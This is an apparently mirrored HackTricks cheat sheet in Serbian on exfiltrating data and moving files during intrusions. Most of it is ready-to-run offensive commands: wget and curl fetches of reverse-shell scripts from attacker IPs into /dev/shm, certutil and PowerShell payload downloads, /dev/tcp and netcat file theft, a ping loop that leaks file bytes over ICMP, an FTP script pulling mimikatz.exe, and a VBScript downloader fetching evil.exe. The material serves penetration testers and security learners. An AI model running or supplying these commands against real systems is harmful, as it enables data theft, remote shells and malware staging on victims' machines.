mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
12 KiB
12 KiB
Izfiltracija
{% hint style="success" %}
Naučite i vežbajte hakovanje AWS:
HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)
Naučite i vežbajte hakovanje GCP: 
HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
- Podelite hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Try Hard Security Group
{% embed url="https://discord.gg/tryhardsecurity" %}
Često dozvoljeni domeni za izfiltriranje informacija
Proverite https://lots-project.com/ da biste pronašli često dozvoljene domene koje mogu biti zloupotrebljene
Kopiranje&lepljenje Base64
Linux
base64 -w0 <file> #Encode file
base64 -d file #Decode file
Windows
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
HTTP
Linux
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD
Windows
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
Postavljanje fajlova
- SimpleHttpServerWithFileUploads
- SimpleHttpServer koji prikazuje GET i POST zahteve (takođe zaglavlja)
- Python modul uploadserver:
# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world
# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
HTTPS Server
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:443
### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
###
### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
###
### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###
FTP
FTP server (python)
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
FTP server (NodeJS)
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
FTP server (pure-ftp)
apt-get update && apt-get install pure-ftp
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Windows klijent
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
SMB
Kali kao server
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
Ili kreirajte smb deljenje koristeći sambu:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
Windows
Exfiltration
Kada je reč o izvlačenju podataka sa Windows sistema, postoje različite metode koje se mogu koristiti. Neke od ovih metoda uključuju:
- Upotreba FTP-a: Korišćenje FTP klijenta za prenos podataka sa zaraženog sistema na udaljeni server.
- Korišćenje Web protokola: Korišćenje HTTP ili HTTPS protokola za slanje podataka na udaljeni server.
- Korišćenje DNS tunela: Korišćenje DNS saobraćaja za skrivanje podataka i njihovo slanje na udaljeni server.
- Korišćenje E-maila: Slanje podataka putem e-mail poruka.
- Korišćenje USB uređaja: Kopiranje podataka na USB uređaj radi fizičkog iznošenja sa zaraženog sistema.
Svaka od ovih metoda ima svoje prednosti i mane, a izbor odgovarajuće metode zavisi od specifičnih zahteva i okolnosti napada.
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
SCP
Napadač mora imati pokrenut SSHd.
scp <username>@<Attacker_IP>:<directory>/<filename>
SSHFS
Ako žrtva ima SSH, napadač može montirati direktorijum sa žrtve na napadača.
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
Mrežni kanal
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
/dev/tcp
Preuzimanje fajla sa žrtve
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
Postavljanje fajla žrtvi
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt
Zahvaljujući @BinaryShadow_
ICMP
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
sniff(iface="tun0", prn=process_packet)
SMTP
Ako možete poslati podatke na SMTP server, možete kreirati SMTP da primite podatke pomoću python-a:
sudo python -m smtpd -n -c DebuggingServer :25
TFTP
Podrazumevano u XP i 2003 (u drugima ga je potrebno eksplicitno dodati tokom instalacije)
Na Kali, pokrenite TFTP server:
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
TFTP server u Pythonu:
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
U žrtva, povežite se sa Kali serverom:
tftp -i <KALI-IP> get nc.exe
PHP
Preuzmite fajl pomoću PHP jednolinijske komande:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
VBScript
Attacker> python -m SimpleHTTPServer 80
Žrtva
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Debug.exe
Program debug.exe ne samo što omogućava inspekciju binarnih fajlova već takođe ima mogućnost da ih rekonstruiše iz heksadecimalnog oblika. To znači da, pružajući heksadecimalni oblik binarnog fajla, debug.exe može generisati binarni fajl. Međutim, važno je napomenuti da debug.exe ima ograničenje u sastavljanju fajlova do 64 kb veličine.
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
DNS
Try Hard Security Group
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Učite i vežbajte hakovanje AWS-a:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte hakovanje GCP-a: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
- Podelite hakovanje trikova slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.